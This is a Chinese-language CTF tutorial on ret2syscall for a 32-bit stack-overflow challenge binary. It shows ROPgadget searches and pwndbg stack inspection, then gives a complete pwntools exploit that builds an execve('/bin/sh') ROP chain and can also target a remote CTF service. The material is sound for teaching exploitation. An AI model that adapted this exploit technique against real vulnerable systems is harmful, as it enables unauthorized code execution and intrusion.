从零开始学逆向:理解ret2syscall

1.题目信息

链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制

 2.原理 

ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?

  • 操作系统提供给用户的编程接口
  • 是提供访问操作系统所管理的底层硬件的接口
  • 本质上是一些内核函数代码,以规范的方式驱动硬件
  • x86 通过 int 0x80 指令进行系统调用、amd64 通过 syscall 指令进行系统调用 mov eax, 0xb mov ebx, [“/bin/sh”] mov ecx, 0 mov edx, 0 int 0x80 => execve("/bin/sh",NULL,NULL) 

    1.jpg

3.解题分析

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# chmod +x ret2syscall 
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# checksec ./ret2syscall 
[*] '/ctf/work/how2heap/ret2syscall/ret2syscall'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x8048000)
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# 

 3.1 使用ida打开分析

gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。

3.2 首先寻找控制 eax 的 gadgets ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'eax'

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'eax'
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bb196 : pop eax ; ret
0x0807217a : pop eax ; ret 0x80e
0x0804f704 : pop eax ; ret 3
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret

3.3 然后寻找控制ebx的 ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'ebx',其中红色框框圈出来的能让我们控制余下的寄存器,就不用再接着找了

​
​
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'ebx'
0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
0x080be23f : pop ebx ; pop edi ; ret
0x0806eb69 : pop ebx ; pop edx ; ret
0x08092258 : pop ebx ; pop esi ; pop ebp ; ret
0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10
0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14
0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc
0x0805ae81 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
0x08048913 : pop ebx ; pop esi ; pop edi ; ret
0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4
0x08049a94 : pop ebx ; pop esi ; ret
0x080481c9 : pop ebx ; ret
0x080d7d3c : pop ebx ; ret 0x6f9
0x08099c87 : pop ebx ; ret 8
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0806336b : pop edi ; pop esi ; pop ebx ; ret
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret
0x0805c820 : pop esi ; pop ebx ; ret
0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0807b6ed : pop ss ; pop ebx ; ret
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ​​

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'ebx'
0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
0x080be23f : pop ebx ; pop edi ; ret
0x0806eb69 : pop ebx ; pop edx ; ret
0x08092258 : pop ebx ; pop esi ; pop ebp ; ret
0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10
0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14
0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc
0x0805ae81 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
0x08048913 : pop ebx ; pop esi ; pop edi ; ret
0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4
0x08049a94 : pop ebx ; pop esi ; ret
0x080481c9 : pop ebx ; ret
0x080d7d3c : pop ebx ; ret 0x6f9
0x08099c87 : pop ebx ; ret 8
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0806336b : pop edi ; pop esi ; pop ebx ; ret
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret
0x0805c820 : pop esi ; pop ebx ; ret
0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0807b6ed : pop ss ; pop ebx ; ret

3.4 接着寻找程序中有没有int 80指令,ROPgadget --binary ret2syscall --only 'int'

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'int'
Gadgets information
============================================================
0x08049421 : int 0x80
0x080938fe : int 0xbb
0x080869b5 : int 0xf6
0x0807b4d4 : int 0xfcUnique gadgets found: 4

3.5 最后我们还需要找到一个字符串/bin/sh,ROPgadget --binary ret2syscall --string '/bin/sh'

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --string '/bin/sh'
Strings information
============================================================
0x080be408 : /bin/sh
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# 

3.6 这样我们就可以构造0xb的系统调用,具体要溢出多少字节可以使用gdb动态调试获取, gdb ret2syscall b main(在main函数下断点) r(让程序跑起来) n(单步执行) 一直走到gets函数输入字符串AAAAAAAA

3.7 然后使用stack 35命令查看栈内容

pwndbg> r
Starting program: /ctf/work/how2heap/ret2syscall/ret2syscall Breakpoint 1, main () at rop.c:8
8       in rop.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────[ REGISTERS ]────────────────────────────────EAX  0x1EBX  0x80481a8 (_init) ◂— push   ebxECX  0x1c872072EDX  0xffffd714 —▸ 0x80481a8 (_init) ◂— push   ebxEDI  0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                                               ESI  0x0EBP  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebxESP  0xffffd670 —▸ 0x80edd40 ◂— 0x0EIP  0x8048e2d (main+9) ◂— mov    eax, dword ptr [0x80ea4c0]
─────────────────────────────────[ DISASM ]──────────────────────────────────► 0x8048e2d <main+9>     mov    eax, dword ptr [stdout] <0x80ea4c0>0x8048e32 <main+14>    mov    dword ptr [esp + 0xc], 00x8048e3a <main+22>    mov    dword ptr [esp + 8], 20x8048e42 <main+30>    mov    dword ptr [esp + 4], 00x8048e4a <main+38>    mov    dword ptr [esp], eax0x8048e4d <main+41>    call   setvbuf <0x804f960>0x8048e52 <main+46>    mov    eax, dword ptr [stdin] <0x80ea4c4>0x8048e57 <main+51>    mov    dword ptr [esp + 0xc], 00x8048e5f <main+59>    mov    dword ptr [esp + 8], 10x8048e67 <main+67>    mov    dword ptr [esp + 4], 00x8048e6f <main+75>    mov    dword ptr [esp], eax
──────────────────────────────────[ STACK ]──────────────────────────────────
00:0000│ esp  0xffffd670 —▸ 0x80edd40 ◂— 0x0
01:0004│      0xffffd674 ◂— 0x0
... ↓
03:000c│      0xffffd67c —▸ 0x80cf999 ◂— add    byte ptr [eax], al
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│      0xffffd68c —▸ 0x80bce97 (__register_frame_info+39) ◂— add    esp, 0x1c                                                                      
────────────────────────────────[ BACKTRACE ]────────────────────────────────► f 0  8048e2d main+9f 1  804907a __libc_start_main+458
Breakpoint main
pwndbg> n
9       in rop.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────[ REGISTERS ]────────────────────────────────EAX  0x0EBX  0x80481a8 (_init) ◂— push   ebxECX  0x0EDX  0x80eb4d4 (_IO_stdfile_1_lock) ◂— 0x0EDI  0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                                               ESI  0x0EBP  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebxESP  0xffffd670 —▸ 0x80ea200 (_IO_2_1_stdout_) ◂— 0xfbad2087EIP  0x8048e52 (main+46) ◂— mov    eax, dword ptr [0x80ea4c4]
─────────────────────────────────[ DISASM ]──────────────────────────────────0x8048e32 <main+14>    mov    dword ptr [esp + 0xc], 00x8048e3a <main+22>    mov    dword ptr [esp + 8], 20x8048e42 <main+30>    mov    dword ptr [esp + 4], 00x8048e4a <main+38>    mov    dword ptr [esp], eax0x8048e4d <main+41>    call   setvbuf <0x804f960>► 0x8048e52 <main+46>    mov    eax, dword ptr [stdin] <0x80ea4c4>0x8048e57 <main+51>    mov    dword ptr [esp + 0xc], 00x8048e5f <main+59>    mov    dword ptr [esp + 8], 10x8048e67 <main+67>    mov    dword ptr [esp + 4], 00x8048e6f <main+75>    mov    dword ptr [esp], eax0x8048e72 <main+78>    call   setvbuf <0x804f960>
──────────────────────────────────[ STACK ]──────────────────────────────────
00:0000│ esp  0xffffd670 —▸ 0x80ea200 (_IO_2_1_stdout_) ◂— 0xfbad2087
01:0004│      0xffffd674 ◂— 0x0
02:0008│      0xffffd678 ◂— 0x2
03:000c│      0xffffd67c ◂— 0x0
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│      0xffffd68c —▸ 0x80bce97 (__register_frame_info+39) ◂— add    esp, 0x1c                                                                      
────────────────────────────────[ BACKTRACE ]────────────────────────────────► f 0  8048e52 main+46f 1  804907a __libc_start_main+458
pwndbg> n
13      in rop.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────[ REGISTERS ]────────────────────────────────EAX  0x0EBX  0x80481a8 (_init) ◂— push   ebxECX  0x0EDX  0x80eb4e0 (_IO_stdfile_0_lock) ◂— 0x0EDI  0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                                               ESI  0x0EBP  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebxESP  0xffffd670 —▸ 0x80ea360 (_IO_2_1_stdin_) ◂— 0xfbad2288EIP  0x8048e77 (main+83) ◂— mov    dword ptr [esp], 0x80be410
─────────────────────────────────[ DISASM ]──────────────────────────────────0x8048e57 <main+51>     mov    dword ptr [esp + 0xc], 00x8048e5f <main+59>     mov    dword ptr [esp + 8], 10x8048e67 <main+67>     mov    dword ptr [esp + 4], 00x8048e6f <main+75>     mov    dword ptr [esp], eax0x8048e72 <main+78>     call   setvbuf <0x804f960>► 0x8048e77 <main+83>     mov    dword ptr [esp], 0x80be4100x8048e7e <main+90>     call   puts <0x804f7e0>0x8048e83 <main+95>     mov    dword ptr [esp], 0x80be43b0x8048e8a <main+102>    call   puts <0x804f7e0>0x8048e8f <main+107>    lea    eax, [esp + 0x1c]0x8048e93 <main+111>    mov    dword ptr [esp], eax
──────────────────────────────────[ STACK ]──────────────────────────────────
00:0000│ esp  0xffffd670 —▸ 0x80ea360 (_IO_2_1_stdin_) ◂— 0xfbad2288
01:0004│      0xffffd674 ◂— 0x0
02:0008│      0xffffd678 ◂— 0x1
03:000c│      0xffffd67c ◂— 0x0
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│      0xffffd68c —▸ 0x80bce97 (__register_frame_info+39) ◂— add    esp, 0x1c                                                                      
────────────────────────────────[ BACKTRACE ]────────────────────────────────► f 0  8048e77 main+83f 1  804907a __libc_start_main+458
pwndbg> n
This time, no system() and NO SHELLCODE!!!
14      in rop.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────[ REGISTERS ]────────────────────────────────EAX  0x2bEBX  0x80481a8 (_init) ◂— push   ebxECX  0x80eb4d4 (_IO_stdfile_1_lock) ◂— 0x0EDX  0x2bEDI  0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                                               ESI  0x0EBP  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebxESP  0xffffd670 —▸ 0x80be410 ◂— push   esp /* 'This time, no system() and NO SHELLCODE!!!' */EIP  0x8048e83 (main+95) ◂— mov    dword ptr [esp], 0x80be43b
─────────────────────────────────[ DISASM ]──────────────────────────────────0x8048e67 <main+67>     mov    dword ptr [esp + 4], 00x8048e6f <main+75>     mov    dword ptr [esp], eax0x8048e72 <main+78>     call   setvbuf <0x804f960>0x8048e77 <main+83>     mov    dword ptr [esp], 0x80be4100x8048e7e <main+90>     call   puts <0x804f7e0>► 0x8048e83 <main+95>     mov    dword ptr [esp], 0x80be43b0x8048e8a <main+102>    call   puts <0x804f7e0>0x8048e8f <main+107>    lea    eax, [esp + 0x1c]0x8048e93 <main+111>    mov    dword ptr [esp], eax0x8048e96 <main+114>    call   gets <0x804f650>0x8048e9b <main+119>    mov    eax, 0
──────────────────────────────────[ STACK ]──────────────────────────────────
00:0000│ esp  0xffffd670 —▸ 0x80be410 ◂— push   esp /* 'This time, no system() and NO SHELLCODE!!!' */
01:0004│      0xffffd674 ◂— 0x0
02:0008│      0xffffd678 ◂— 0x1
03:000c│      0xffffd67c ◂— 0x0
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│      0xffffd68c —▸ 0x80bce97 (__register_frame_info+39) ◂— add    esp, 0x1c                                                                      
────────────────────────────────[ BACKTRACE ]────────────────────────────────► f 0  8048e83 main+95f 1  804907a __libc_start_main+458
pwndbg> n
What do you plan to do?
15      in rop.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────[ REGISTERS ]────────────────────────────────EAX  0x18EBX  0x80481a8 (_init) ◂— push   ebxECX  0x80eb4d4 (_IO_stdfile_1_lock) ◂— 0x0EDX  0x18EDI  0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                                               ESI  0x0EBP  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebxESP  0xffffd670 —▸ 0x80be43b ◂— push   edi /* 'What do you plan to do?' */EIP  0x8048e8f (main+107) ◂— lea    eax, [esp + 0x1c]
─────────────────────────────────[ DISASM ]──────────────────────────────────0x8048e72 <main+78>     call   setvbuf <0x804f960>0x8048e77 <main+83>     mov    dword ptr [esp], 0x80be4100x8048e7e <main+90>     call   puts <0x804f7e0>0x8048e83 <main+95>     mov    dword ptr [esp], 0x80be43b0x8048e8a <main+102>    call   puts <0x804f7e0>► 0x8048e8f <main+107>    lea    eax, [esp + 0x1c]0x8048e93 <main+111>    mov    dword ptr [esp], eax0x8048e96 <main+114>    call   gets <0x804f650>0x8048e9b <main+119>    mov    eax, 00x8048ea0 <main+124>    leave  0x8048ea1 <main+125>    ret    
──────────────────────────────────[ STACK ]──────────────────────────────────
00:0000│ esp  0xffffd670 —▸ 0x80be43b ◂— push   edi /* 'What do you plan to do?' */
01:0004│      0xffffd674 ◂— 0x0
02:0008│      0xffffd678 ◂— 0x1
03:000c│      0xffffd67c ◂— 0x0
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│      0xffffd68c —▸ 0x80bce97 (__register_frame_info+39) ◂— add    esp, 0x1c                                                                      
────────────────────────────────[ BACKTRACE ]────────────────────────────────► f 0  8048e8f main+107f 1  804907a __libc_start_main+458
pwndbg> n
AAAAAAAA       
17      in rop.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────[ REGISTERS ]────────────────────────────────EAX  0xffffd68c ◂— 'AAAAAAAA'EBX  0x80481a8 (_init) ◂— push   ebxECX  0xfbad2288EDX  0x80eb4e0 (_IO_stdfile_0_lock) ◂— 0x0EDI  0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                                               ESI  0x0EBP  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebxESP  0xffffd670 —▸ 0xffffd68c ◂— 'AAAAAAAA'EIP  0x8048e9b (main+119) ◂— mov    eax, 0
─────────────────────────────────[ DISASM ]──────────────────────────────────0x8048e83 <main+95>                  mov    dword ptr [esp], 0x80be43b0x8048e8a <main+102>                 call   puts <0x804f7e0>0x8048e8f <main+107>                 lea    eax, [esp + 0x1c]0x8048e93 <main+111>                 mov    dword ptr [esp], eax0x8048e96 <main+114>                 call   gets <0x804f650>► 0x8048e9b <main+119>                 mov    eax, 00x8048ea0 <main+124>                 leave  0x8048ea1 <main+125>                 ret    ↓0x804907a <__libc_start_main+458>    mov    dword ptr [esp], eax0x804907d <__libc_start_main+461>    call   exit <0x804e740>0x8049082 <__libc_start_main+466>    call   _dl_discover_osversion <0x80700b0>                                                                         
──────────────────────────────────[ STACK ]──────────────────────────────────
00:0000│ esp  0xffffd670 —▸ 0xffffd68c ◂— 'AAAAAAAA'
01:0004│      0xffffd674 ◂— 0x0
02:0008│      0xffffd678 ◂— 0x1
03:000c│      0xffffd67c ◂— 0x0
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│ eax  0xffffd68c ◂— 'AAAAAAAA'
────────────────────────────────[ BACKTRACE ]────────────────────────────────► f 0  8048e9b main+119f 1  804907a __libc_start_main+458
pwndbg> stack 35
00:0000│ esp  0xffffd670 —▸ 0xffffd68c ◂— 'AAAAAAAA'
01:0004│      0xffffd674 ◂— 0x0
02:0008│      0xffffd678 ◂— 0x1
03:000c│      0xffffd67c ◂— 0x0
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│ eax  0xffffd68c ◂— 'AAAAAAAA'
... ↓
09:0024│      0xffffd694 —▸ 0xffffd700 ◂— 0x1
0a:0028│      0xffffd698 ◂— 0x80000
0b:002c│      0xffffd69c —▸ 0x8048c1f (init_cacheinfo+319) ◂— mov    esi, eax
0c:0030│      0xffffd6a0 ◂— 0x28 /* '(' */
0d:0034│      0xffffd6a4 ◂— 0x10
0e:0038│      0xffffd6a8 —▸ 0x80e9f44 —▸ 0x80eaea0 (_nl_global_locale) —▸ 0x80c3ae0 (_nl_C_LC_CTYPE) —▸ 0x80d15fc (_nl_C_name) ◂— ...                     
0f:003c│      0xffffd6ac —▸ 0x8048e03 (frame_dummy+35) ◂— mov    eax, dword ptr [0x80e9f64]                                                               
10:0040│      0xffffd6b0 —▸ 0x80da404 (__EH_FRAME_BEGIN__) ◂— adc    al, 0
11:0044│      0xffffd6b4 —▸ 0x80eaf84 (object) ◂— 0xffffffff
12:0048│      0xffffd6b8 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
13:004c│      0xffffd6bc ◂— 0x1
14:0050│      0xffffd6c0 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
15:0054│      0xffffd6c4 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
16:0058│      0xffffd6c8 ◂— 0x1
17:005c│      0xffffd6cc —▸ 0x8049612 (__libc_csu_init+130) ◂— add    ebp, 1
18:0060│      0xffffd6d0 ◂— 0x1
19:0064│      0xffffd6d4 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
1a:0068│      0xffffd6d8 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
1b:006c│      0xffffd6dc ◂— 0x2
1c:0070│      0xffffd6e0 —▸ 0x80ea078 (__exit_funcs) —▸ 0x80eb2a0 (initial) ◂— 0x0
1d:0074│      0xffffd6e4 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
1e:0078│      0xffffd6e8 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
1f:007c│      0xffffd6ec —▸ 0x80481a8 (_init) ◂— push   ebx
20:0080│      0xffffd6f0 ◂— 0x0
21:0084│      0xffffd6f4 —▸ 0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                         
22:0088│ ebp  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebx
pwndbg> 

pwndbg> stack 35
00:0000│ esp  0xffffd670 —▸ 0xffffd68c ◂— 'AAAAAAAA'
01:0004│      0xffffd674 ◂— 0x0
02:0008│      0xffffd678 ◂— 0x1
03:000c│      0xffffd67c ◂— 0x0
04:0010│      0xffffd680 ◂— 0x1
05:0014│      0xffffd684 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
06:0018│      0xffffd688 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
07:001c│ eax  0xffffd68c ◂— 'AAAAAAAA'
... ↓
09:0024│      0xffffd694 —▸ 0xffffd700 ◂— 0x1
0a:0028│      0xffffd698 ◂— 0x80000
0b:002c│      0xffffd69c —▸ 0x8048c1f (init_cacheinfo+319) ◂— mov    esi, eax
0c:0030│      0xffffd6a0 ◂— 0x28 /* '(' */
0d:0034│      0xffffd6a4 ◂— 0x10
0e:0038│      0xffffd6a8 —▸ 0x80e9f44 —▸ 0x80eaea0 (_nl_global_locale) —▸ 0x80c3ae0 (_nl_C_LC_CTYPE) —▸ 0x80d15fc (_nl_C_name) ◂— ...                     
0f:003c│      0xffffd6ac —▸ 0x8048e03 (frame_dummy+35) ◂— mov    eax, dword ptr [0x80e9f64]                                                               
10:0040│      0xffffd6b0 —▸ 0x80da404 (__EH_FRAME_BEGIN__) ◂— adc    al, 0
11:0044│      0xffffd6b4 —▸ 0x80eaf84 (object) ◂— 0xffffffff
12:0048│      0xffffd6b8 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
13:004c│      0xffffd6bc ◂— 0x1
14:0050│      0xffffd6c0 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
15:0054│      0xffffd6c4 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
16:0058│      0xffffd6c8 ◂— 0x1
17:005c│      0xffffd6cc —▸ 0x8049612 (__libc_csu_init+130) ◂— add    ebp, 1
18:0060│      0xffffd6d0 ◂— 0x1
19:0064│      0xffffd6d4 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
1a:0068│      0xffffd6d8 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
1b:006c│      0xffffd6dc ◂— 0x2
1c:0070│      0xffffd6e0 —▸ 0x80ea078 (__exit_funcs) —▸ 0x80eb2a0 (initial) ◂— 0x0
1d:0074│      0xffffd6e4 —▸ 0xffffd784 —▸ 0xffffd8b3 ◂— '/ctf/work/how2heap/ret2syscall/ret2syscall'
1e:0078│      0xffffd6e8 —▸ 0xffffd78c —▸ 0xffffd8de ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
1f:007c│      0xffffd6ec —▸ 0x80481a8 (_init) ◂— push   ebx
20:0080│      0xffffd6f0 ◂— 0x0
21:0084│      0xffffd6f4 —▸ 0x80ea00c (_GLOBAL_OFFSET_TABLE_+12) —▸ 0x8065cb0 (__stpcpy_ssse3) ◂— mov    edx, dword ptr [esp + 4]                         
22:0088│ ebp  0xffffd6f8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebx
 

f8 - 8c = 6c,再加上ebp的4个字节,总共需要填充0x70个字节到返回地址 最后成功利用的堆栈图如下

10.jpg

3.8 exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-from pickle import TRUE
from pwn import *
import syscontext.terminal=["tmux","sp","-h"]
context.log_level='debug'
#context.arch='i386'DEBUG = 1LOCAL = True
BIN   ='./ret2syscall'
HOST  ='pwn2.jarvisoj.com'
PORT  =9877
#HOST  ='node5.buuoj.cn'
#PORT  =29787def get_base_address(proc):return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)def debug(bps,_s):script = "handle SIGALRM ignore\n"PIE = get_base_address(p)script += "set $_base = 0x{:x}\n".format(PIE)for bp in bps:script += "b *0x%x\n"%(PIE+bp)script += _sgdb.attach(p,gdbscript=script)# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab#shellcode = asm(shellcraft.sh())def exploit(p):pop_eax_ret = 0x080bb196pop_edx_ecx_ebx_ret = 0x0806eb90int_80 = 0x08049421bin_sh = 0x080be408pl = flat(['A' * 0x70,  pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, bin_sh, int_80])p.sendline(pl)p.interactive()returnif __name__ == "__main__":elf = ELF(BIN)if len(sys.argv) > 1:LOCAL = Falsep = remote(HOST, PORT)exploit(p)else:LOCAL = Truep = process(BIN)log.info('PID: '+ str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],"")exploit(p)

3.9 运行结果 

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# python ret2syscall1.py                                 │ ESI  0x80ea360 (_IO_2_1_stdin_) ◂— 0xfbad2288
[DEBUG] '/ctf/work/how2heap/ret2syscall/ret2syscall' is statically linked, skipping GOT/PLT symbols      │ EBP  0xff8584b8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebx
[DEBUG] '/ctf/work/how2heap/ret2syscall/ret2syscall' is statically linked, skipping GOT/PLT symbols      │ ESP  0xff8583a8 —▸ 0xff8584b8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebx
